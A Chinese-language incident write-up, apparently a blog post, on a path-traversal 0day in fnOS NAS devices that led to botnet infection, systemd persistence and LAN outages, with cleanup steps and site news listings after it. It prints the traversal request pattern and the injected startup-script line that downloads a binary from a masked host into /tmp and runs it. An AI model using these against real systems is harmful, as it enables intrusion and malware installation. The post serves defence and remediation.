飞牛 NAS(fnOS)app-center-static 0day 漏洞复盘 一次从“全网断线”到系统级持久化后门的完整溯源与清除实战
飞牛 NASfnOSapp-center-static 0day 漏洞复盘一次从“全网断线”到系统级持久化后门的完整溯源与清除实战关键词fnOS、飞牛 NAS、0day、路径遍历、远程执行、systemd 持久化、僵尸网络、Linux 安全在很多家庭和小型办公场景中NAS 被视为“稳定、可靠、无需过多维护”的基础设施但现实却恰恰相反——它本质上是一台长期暴露在网络边界的 Linux 服务器。一旦系统组件存在高危漏洞或被错误地开放到公网攻击者就可以在极短时间内完成扫描、利用与植入后门。飞牛 NASfnOS此次 app-center-static 0day 事件正是一次典型的“静默入侵”案例表面只是网络变慢、频繁断线背后却是一整套自动化攻击与持久化控制机制在运行。本文通过一次真实中毒排查过程深入剖析漏洞原理、攻击链路与修复思路帮助读者真正理解这类安全事故的成因与防范要点。一、事件背景一台 NAS拖垮整个网络在家庭与小微办公环境中NAS 往往是全天候在线的“核心节点”。一旦该节点被攻陷其危害远不止数据安全而是会直接影响整个局域网的稳定性。本次事件的导火索并非“系统报毒”而是极其反常的网络行为路由器连接数飙升至20 万级局域网设备频繁掉线、DHCP 获取失败限制 NAS 连接数后全网恢复这表明问题并不在路由器而是来自内网的攻击源。二、漏洞本质app-center-static 路径遍历导致的远程执行经社区分析fnOS 在早期版本中存在一个高危文件访问漏洞/app-center-static/serviceicon/myapp/{0}?size../../../../由于后端对参数未做有效路径过滤攻击者可构造请求直接遍历系统目录读取任意文件在特定条件下写入或替换脚本最终形成远程命令执行RCE这一漏洞具备典型 0day 特征无需认证、无需交互、可自动化批量扫描利用。从 Web 服务实现机制来看app-center-static 本质上是一个用于向前端提供应用图标与静态资源的接口其设计初衷是通过 URL 参数动态拼接文件路径再从服务器本地读取对应文件并返回给浏览器。然而在 fnOS 的早期实现中后端仅对参数做了简单字符串拼接并未对 …/、URL 编码后的路径跳转符如 %2e%2e%2f、%7b0%7d 等进行规范化与校验导致攻击者可以利用“路径穿越”绕过目录限制直接访问系统根目录下的任意文件。当这一漏洞与 NAS 系统默认以高权限用户运行的服务特性叠加时风险被进一步放大——攻击者不仅可以读取诸如 /etc/passwd、/etc/shadow、启动脚本等敏感文件还可以在某些可写目录中植入恶意脚本并通过系统启动流程或 Web 服务回调触发执行从而演变为真正意义上的远程命令执行RCE。更危险的是这类漏洞极易被自动化工具规模利用。攻击者通常会在互联网上批量扫描暴露 80/443 端口的 fnOS 设备通过构造固定的漏洞请求模板快速判断目标是否可利用一旦命中便立即下发后门程序实现“秒级感染”。由于整个过程无需登录、无需交互、无明显异常提示受害者往往只能在网络被拖垮或系统被植入后门数天甚至数周后才意识到问题的严重性。这也正是该漏洞被视为典型 0day 的原因——它不仅破坏力强而且具备极高的传播效率与隐蔽性对缺乏安全防护的 NAS 用户构成了系统级威胁。三、攻击链路复盘从漏洞到系统级后门1. 初始入侵攻击者通过批量扫描公网 fnOS 设备一旦命中漏洞立即在系统启动脚本中注入恶意代码。被篡改的关键文件/usr/trim/bin/system_startup.sh该脚本原本负责系统服务初始化却被追加了远程下载执行逻辑。2. 恶意载荷下发被注入的代码会尝试从多个地址下载二进制wgethttp://xxx/turmp -O /tmp/turmpchmod777/tmp/turmp /tmp/turmp这类“多地址轮询”是典型僵尸网络投放手法用于规避封堵。3. 持久化机制为了防止被清除恶意程序会在/usr/lib/systemd/system/中注册伪装服务修改文件为immutablei 属性通过 systemd 开机自启若被删除则由守护进程重新生成四、异常行为的网络层解释现象技术原因NAT 表耗尽恶意代理制造大量并发连接内网广播风暴ARP 扫描与横向探测路由 CPU 飙升conntrack 表爆满WiFi 断线DHCP 请求被阻塞攻击源在内网因此运营商与路由器的外部防护机制完全失效。在家庭或小型办公网络中路由器与交换芯片的设计初衷是应对“正常用户流量”而不是承受服务器级别的高并发连接。当飞牛 NAS 被植入恶意代理或僵尸网络组件后它会在后台不断建立对外连接并同时接收来自公网的转发请求短时间内即可产生成千上万条会话记录。这些连接会被路由器记录在 NAT 映射表与 conntrack 连接跟踪表中而家用设备的表容量通常只有几万条一旦被迅速占满新连接将无法创建直接表现为“所有设备突然无法上网”。与此同时恶意程序往往会在局域网内执行 ARP 扫描与主机探测以寻找可横向入侵的目标。这类行为会以广播方式频繁向交换网络发送请求触发二层广播风暴使交换机和无线路由芯片的转发表频繁刷新CPU 与缓存资源被迅速耗尽。此时即便网络链路本身并未中断设备之间的数据包也会大量丢失导致延迟激增、连接不稳定。当路由器 CPU 被连接跟踪与广播处理任务压满后DHCP 服务也会受到影响新设备将无法正常获取 IP 地址WiFi 表面看似“已连接”实际上却无法访问任何网络资源。由于这些异常流量全部来自内网运营商侧与传统防火墙的防护策略无法识别为外部攻击进一步增加了排查难度这也是为何许多用户最初误以为是“宽带故障”或“路由器老化”的根本原因。五、溯源与清除系统级修复要点1. 停止并禁用恶意服务systemctl stop SazW nginx dockers trim_pap sync_server systemctl disable SazW nginx dockers trim_pap sync_server2. 去除不可修改属性chattr -i /sbin/gots /usr/bin/dockers...3. 强制删除恶意文件rm-rf /sbin/gots /usr/bin/dockers...4. 重载 systemdsystemctl daemon-reload六、为何升级“短暂有效”升级覆盖了 Web 漏洞入口却未清除已植入的后门。系统重启后恶意服务仍会恢复因此症状“暂时消失”只是假象。七、经验与安全建议NAS 属于服务器不是家电任何公网暴露服务都是攻击面固件升级 ≠ 系统干净必须检查 systemd、cron、启动脚本网络异常往往是安全事件的第一信号结语这次事件并非个案而是IoT 与轻服务器设备安全困境的缩影。当系统默认“方便优先”而非“安全优先”时用户必须为其后果买单。真正的安全不是补一个漏洞而是建立完整的威胁模型与响应机制。飞牛 NAS 漏洞事件揭示了一个被长期忽视的事实当边缘设备被攻陷它带来的影响远不止单点失效而是可能成为整个内网的“隐形攻击源”。从路径遍历到远程执行再到 systemd 持久化后门与恶意流量放大这是一条完整而成熟的黑产攻击链。简单的系统升级只能修补入口却无法清除已经植入的恶意组件真正的恢复必须从启动脚本、服务管理、文件属性和网络行为等多层面彻底排查。只有将 NAS 纳入严肃的安全运维体系遵循最小暴露原则并持续监控异常才能避免类似事件再次发生。

相关新闻

10个提示词:让Copilot写高覆盖测试用例(2026实战指南)

10个提示词:让Copilot写高覆盖测试用例(2026实战指南)

‌一、为什么测试从业者需要关注Copilot提示词?‌ 2026年AI测试工具使用率年增40%,其中Copilot凭借其代码生成能力,成为提升测试覆盖率的利器。通过精准提示词,可自动化生成边界值、异常流、合规校验等复杂用例,将用例…

2026/7/3 14:11:07 阅读更多 →
飞牛 NAS 被黑实录:断网排查、流量溯源与一键修复(含一键检测脚本)

飞牛 NAS 被黑实录:断网排查、流量溯源与一键修复(含一键检测脚本)

飞牛 NAS 被黑实录:断网排查、流量溯源与一键修复(含一键检测脚本) 关键词:飞牛 NAS、0day 漏洞、异常流量、内网阻塞、僵尸进程、iptables、僵尸端口、ARP 风暴、恶意代理、Linux 安全 在家庭与小微办公场景中,NAS 早…

2026/7/3 14:11:08 阅读更多 →
用Obsidian构建量子测试知识图谱:模板开源与公众号热度解析

用Obsidian构建量子测试知识图谱:模板开源与公众号热度解析

量子测试与知识图谱的融合价值 在软件测试领域,量子计算技术的兴起正重塑测试方法论,带来前所未有的效率提升和复杂性挑战。量子测试涉及量子算法验证、错误检测和模拟环境构建,其知识体系碎片化且更新迅速。传统文档管理难以应对&#xff0…

2026/7/4 16:21:08 阅读更多 →

最新新闻

跨平台开发实战:从操作系统差异看远程控制软件适配挑战

跨平台开发实战:从操作系统差异看远程控制软件适配挑战

🚀 30款热门AI模型一站整合,DeepSeek/GLM/Claude 随心用,限时 5 折。 👉 点击领海量免费额度 你是不是也经常遇到这样的困惑:手头一台Windows笔记本办公,家里一台Mac Mini当服务器,还有一台L…

2026/7/4 17:35:03 阅读更多 →
基于YOLOv8的字符识别系统开发与实践

基于YOLOv8的字符识别系统开发与实践

1. 项目概述这个基于YOLOv8的字母数字识别检测系统是我最近完成的一个计算机视觉项目。它能够实时检测并识别图像和视频中的36类字符(数字0-9和字母A-Z),在复杂场景下表现出色。相比传统OCR技术,这个系统最大的优势在于能够处理任…

2026/7/4 17:33:03 阅读更多 →
3分钟掌握Windows显示器亮度调节:Twinkle Tray完全指南

3分钟掌握Windows显示器亮度调节:Twinkle Tray完全指南

3分钟掌握Windows显示器亮度调节:Twinkle Tray完全指南 【免费下载链接】twinkle-tray Easily manage the brightness of your monitors in Windows from the system tray 项目地址: https://gitcode.com/gh_mirrors/tw/twinkle-tray 你是否曾经为Windows系统…

2026/7/4 17:33:02 阅读更多 →
机器学习模型服务化落地:生产稳定性与可观测性实战

机器学习模型服务化落地:生产稳定性与可观测性实战

1. 项目概述:这不是一次“部署上线”演示,而是一场真实世界的ML交付实战复盘 “From Notebook to Production: Running ML in the Real World (Part 4)”——这个标题里藏着三个关键信号: Notebook 是起点,不是终点;…

2026/7/4 17:33:02 阅读更多 →
终极指南:3步实现ComfyUI TensorRT加速,让你的AI绘图速度提升3-10倍

终极指南:3步实现ComfyUI TensorRT加速,让你的AI绘图速度提升3-10倍

终极指南:3步实现ComfyUI TensorRT加速,让你的AI绘图速度提升3-10倍 【免费下载链接】ComfyUI_TensorRT 项目地址: https://gitcode.com/gh_mirrors/co/ComfyUI_TensorRT 你是否还在为Stable Diffusion生成图像时的漫长等待而烦恼?每…

2026/7/4 17:31:02 阅读更多 →
JMeter变量作用域详解:从本地变量到全局属性的跨线程组参数传递实战

JMeter变量作用域详解:从本地变量到全局属性的跨线程组参数传递实战

1. 项目概述:从一次参数传递的“事故”说起前几天,我团队里一个刚接触Jmeter不久的小伙伴跑来求助,他写了一个模拟用户登录后查询订单的压测脚本,结果跑出来的数据完全不对。登录是成功了,但后续的订单查询请求里&…

2026/7/4 17:29:02 阅读更多 →

日新闻

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 发布:关键安全修复版本,多项问题得到解决

Memcached 1.6.43 正式发布,这是一个关键的安全修复版本,修复了多个方面的问题,还对部分功能进行了优化。 安全修复亮点 此次发布在安全修复上表现突出。binprot 避免了项目引用计数溢出,mcmc 因安全问题提升了上游版本号&#xf…

2026/7/4 0:04:29 阅读更多 →
终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案

终极指南:使用HMCL启动器跨平台畅玩Minecraft的完整解决方案 【免费下载链接】HMCL A Minecraft Launcher which is multi-functional, cross-platform and popular 项目地址: https://gitcode.com/gh_mirrors/hm/HMCL HMCL(Hello Minecraft! Lau…

2026/7/4 0:06:29 阅读更多 →
KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

KMX63与PIC18F66K40在嵌入式HMI中的硬件协同与低功耗设计

1. KMX63与PIC18F66K40的硬件协同架构解析KMX63作为一款三轴加速度计和磁力计组合传感器,与PIC18F66K40微控制器的搭配堪称嵌入式HMI开发的黄金组合。这套硬件组合的核心优势在于KMX63提供的高精度运动感知能力与PIC18F66K40强大的信号处理能力形成了完美互补。KMX6…

2026/7/4 0:06:29 阅读更多 →

周新闻

月新闻